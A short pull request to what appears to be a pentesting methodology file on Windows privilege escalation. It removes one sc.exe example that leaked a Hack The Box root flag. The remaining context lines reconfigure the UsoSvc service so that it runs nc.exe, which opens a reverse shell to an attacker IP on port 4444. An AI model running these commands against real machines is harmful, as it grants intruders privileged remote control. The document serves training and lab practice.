### PR TITLE
Remove example from win priv esc

### DIFF
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -519,7 +519,6 @@ Prerequisite: Service account
 
 ```powershell
 PS C:\Windows\system32> sc.exe stop UsoSvc
-PS C:\Windows\system32> sc.exe config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt"
 PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
 PS C:\Windows\system32> sc.exe qc usosvc


### PR DESCRIPTION
This example was used on hackthebox where it leaked the root flag of a machine on free servers.
This resulted in every user being able to get the root flag before they have even completed the box which isn't fair to others.

This example should either be changed or removed completely to combat copy-pasting without knowing what you're doing.